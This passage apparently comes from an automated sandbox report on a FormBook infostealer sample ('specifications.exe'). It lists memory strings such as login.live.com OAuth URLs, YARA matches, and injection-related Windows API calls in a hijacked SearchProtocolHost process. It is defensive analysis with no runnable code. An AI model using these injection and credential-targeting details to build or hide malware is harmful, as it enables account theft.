                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.000000000044D000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.000000000044D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.000000000044D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfz
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: SearchProtocolHost.exe, 00000007.00000002.4144766432.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: SearchProtocolHost.exe, 00000007.00000003.2216948819.0000000007659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.00000000040BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0042CAB3 NtClose,2_2_0042CAB3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2B60 NtClose,LdrInitializeThunk,2_2_010C2B60
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_010C2DF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_010C2C70
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C35C0 NtCreateMutant,LdrInitializeThunk,2_2_010C35C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C4340 NtSetContextThread,2_2_010C4340
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C4650 NtSuspendThread,2_2_010C4650
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2B80 NtQueryInformationFile,2_2_010C2B80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2BA0 NtEnumerateValueKey,2_2_010C2BA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2BE0 NtQueryValueKey,2_2_010C2BE0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2BF0 NtAllocateVirtualMemory,2_2_010C2BF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2AB0 NtWaitForSingleObject,2_2_010C2AB0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2AD0 NtReadFile,2_2_010C2AD0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2AF0 NtWriteFile,2_2_010C2AF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2D00 NtSetInformationFile,2_2_010C2D00
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2D10 NtMapViewOfSection,2_2_010C2D10
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2D30 NtUnmapViewOfSection,2_2_010C2D30
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2DB0 NtEnumerateKey,2_2_010C2DB0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2DD0 NtDelayExecution,2_2_010C2DD0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2C00 NtQueryInformationProcess,2_2_010C2C00
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2C60 NtCreateKey,2_2_010C2C60
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2CA0 NtQueryInformationToken,2_2_010C2CA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2CC0 NtQueryVirtualMemory,2_2_010C2CC0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2CF0 NtOpenProcess,2_2_010C2CF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2F30 NtCreateSection,2_2_010C2F30
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2F60 NtCreateProcessEx,2_2_010C2F60
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2F90 NtProtectVirtualMemory,2_2_010C2F90
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2FA0 NtQuerySection,2_2_010C2FA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2FB0 NtResumeThread,2_2_010C2FB0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2FE0 NtCreateFile,2_2_010C2FE0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2E30 NtWriteVirtualMemory,2_2_010C2E30
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2E80 NtReadVirtualMemory,2_2_010C2E80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2EA0 NtAdjustPrivilegesToken,2_2_010C2EA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2EE0 NtQueueApcThread,2_2_010C2EE0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C3010 NtOpenDirectoryObject,2_2_010C3010
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C3090 NtSetValueKey,2_2_010C3090
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C39B0 NtGetContextThread,2_2_010C39B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C3D10 NtOpenProcessToken,2_2_010C3D10
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C3D70 NtOpenThread,2_2_010C3D70
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B64340 NtSetContextThread,LdrInitializeThunk,7_2_00B64340
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B64650 NtSuspendThread,LdrInitializeThunk,7_2_00B64650
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62AF0 NtWriteFile,LdrInitializeThunk,7_2_00B62AF0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62AD0 NtReadFile,LdrInitializeThunk,7_2_00B62AD0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_00B62BA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00B62BF0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62BE0 NtQueryValueKey,LdrInitializeThunk,7_2_00B62BE0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62B60 NtClose,LdrInitializeThunk,7_2_00B62B60
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_00B62CA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00B62C70
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62C60 NtCreateKey,LdrInitializeThunk,7_2_00B62C60
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00B62DF0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62DD0 NtDelayExecution,LdrInitializeThunk,7_2_00B62DD0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_00B62D30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62D10 NtMapViewOfSection,LdrInitializeThunk,7_2_00B62D10
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_00B62E80
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62EE0 NtQueueApcThread,LdrInitializeThunk,7_2_00B62EE0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62FB0 NtResumeThread,LdrInitializeThunk,7_2_00B62FB0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62FE0 NtCreateFile,LdrInitializeThunk,7_2_00B62FE0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62F30 NtCreateSection,LdrInitializeThunk,7_2_00B62F30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B635C0 NtCreateMutant,LdrInitializeThunk,7_2_00B635C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B639B0 NtGetContextThread,LdrInitializeThunk,7_2_00B639B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62AB0 NtWaitForSingleObject,7_2_00B62AB0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62B80 NtQueryInformationFile,7_2_00B62B80
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62CF0 NtOpenProcess,7_2_00B62CF0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62CC0 NtQueryVirtualMemory,7_2_00B62CC0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62C00 NtQueryInformationProcess,7_2_00B62C00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62DB0 NtEnumerateKey,7_2_00B62DB0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62D00 NtSetInformationFile,7_2_00B62D00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62EA0 NtAdjustPrivilegesToken,7_2_00B62EA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62E30 NtWriteVirtualMemory,7_2_00B62E30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62FA0 NtQuerySection,7_2_00B62FA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62F90 NtProtectVirtualMemory,7_2_00B62F90
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B62F60 NtCreateProcessEx,7_2_00B62F60
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B63090 NtSetValueKey,7_2_00B63090
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B63010 NtOpenDirectoryObject,7_2_00B63010
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B63D10 NtOpenProcessToken,7_2_00B63D10
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B63D70 NtOpenThread,7_2_00B63D70
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001393A0 NtCreateFile,7_2_001393A0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00139510 NtReadFile,7_2_00139510
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00139610 NtDeleteFile,7_2_00139610
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_001396B0 NtClose,7_2_001396B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00139820 NtAllocateVirtualMemory,7_2_00139820
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE08610_2_02FE0861
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE0F400_2_02FE0F40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE0BC30_2_02FE0BC3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE0B580_2_02FE0B58
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE09710_2_02FE0971
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE092B0_2_02FE092B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE09090_2_02FE0909
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE0EC10_2_02FE0EC1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE0E450_2_02FE0E45
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE2CE80_2_02FE2CE8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE2CDA0_2_02FE2CDA
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE13C10_2_02FE13C1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE37F80_2_02FE37F8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE37EA0_2_02FE37EA
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A0A00400_2_0A0A0040
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A0A2DD80_2_0A0A2DD8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A39FB580_2_0A39FB58
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A399BE00_2_0A399BE0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A3928E80_2_0A3928E8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A3928D80_2_0A3928D8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A39BFB80_2_0A39BFB8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A39BFC80_2_0A39BFC8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A39B2B80_2_0A39B2B8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A39A0080_2_0A39A008
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A3900070_2_0A390007
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A3900400_2_0A390040
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A39B6F00_2_0A39B6F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00418A932_2_00418A93
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0042F0D32_2_0042F0D3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004028F02_2_004028F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004031762_2_00403176
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004011002_2_00401100
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004031802_2_00403180
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004103032_2_00410303
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040245D2_2_0040245D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004024602_2_00402460
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00416C932_2_00416C93
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040E5192_2_0040E519
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_004105232_2_00410523
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040E5232_2_0040E523
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040E6672_2_0040E667
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040E6732_2_0040E673
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040E73B2_2_0040E73B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010801002_2_01080100
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112A1182_2_0112A118
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011181582_2_01118158
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011441A22_2_011441A2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011501AA2_2_011501AA
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011481CC2_2_011481CC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011220002_2_01122000
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114A3522_2_0114A352
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011503E62_2_011503E6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E3F02_2_0109E3F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011302742_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011102C02_2_011102C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010905352_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011505912_2_01150591
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011344202_2_01134420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011424462_2_01142446
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113E4F62_2_0113E4F6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B47502_2_010B4750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010907702_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108C7C02_2_0108C7C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AC6E02_2_010AC6E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A69622_2_010A6962
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010929A02_2_010929A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0115A9A62_2_0115A9A6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109A8402_2_0109A840
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010928402_2_01092840
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010768B82_2_010768B8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE8F02_2_010BE8F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114AB402_2_0114AB40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01146BD72_2_01146BD7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108EA802_2_0108EA80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109AD002_2_0109AD00
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112CD1F2_2_0112CD1F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A8DBF2_2_010A8DBF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108ADE02_2_0108ADE0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090C002_2_01090C00
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130CB52_2_01130CB5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080CF22_2_01080CF2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01132F302_2_01132F30
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010D2F282_2_010D2F28
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B0F302_2_010B0F30
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01104F402_2_01104F40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110EFA02_2_0110EFA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01082FC82_2_01082FC8
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114EE262_2_0114EE26
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090E592_2_01090E59
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114CE932_2_0114CE93
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A2E902_2_010A2E90
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114EEDB2_2_0114EEDB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C516C2_2_010C516C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107F1722_2_0107F172
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0115B16B2_2_0115B16B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109B1B02_2_0109B1B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010970C02_2_010970C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113F0CC2_2_0113F0CC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114F0E02_2_0114F0E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011470E92_2_011470E9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114132D2_2_0114132D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107D34C2_2_0107D34C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010D739A2_2_010D739A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010952A02_2_010952A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AB2C02_2_010AB2C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AD2F02_2_010AD2F0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011312ED2_2_011312ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011475712_2_01147571
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112D5B02_2_0112D5B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011595C32_2_011595C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114F43F2_2_0114F43F
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010814602_2_01081460
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114F7B02_2_0114F7B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010D56302_2_010D5630
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011416CC2_2_011416CC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011259102_2_01125910
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010999502_2_01099950
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AB9502_2_010AB950
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FD8002_2_010FD800
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010938E02_2_010938E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FB762_2_0114FB76
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AFB802_2_010AFB80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01105BF02_2_01105BF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010CDBF92_2_010CDBF9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01147A462_2_01147A46
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FA492_2_0114FA49
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01103A6C2_2_01103A6C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010D5AA02_2_010D5AA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01131AA32_2_01131AA3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112DAAC2_2_0112DAAC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113DAC62_2_0113DAC6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01093D402_2_01093D40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01141D5A2_2_01141D5A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01147D732_2_01147D73
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AFDC02_2_010AFDC0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01109C322_2_01109C32
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FCF22_2_0114FCF2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FF092_2_0114FF09
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01091F922_2_01091F92
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FFB12_2_0114FFB1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01053FD52_2_01053FD5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01053FD22_2_01053FD2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01099EB02_2_01099EB0
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032F9A8E6_2_032F9A8E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D902E6_2_032D902E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D90226_2_032D9022
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D90F66_2_032D90F6
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032E164E6_2_032E164E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032DAEDE6_2_032DAEDE
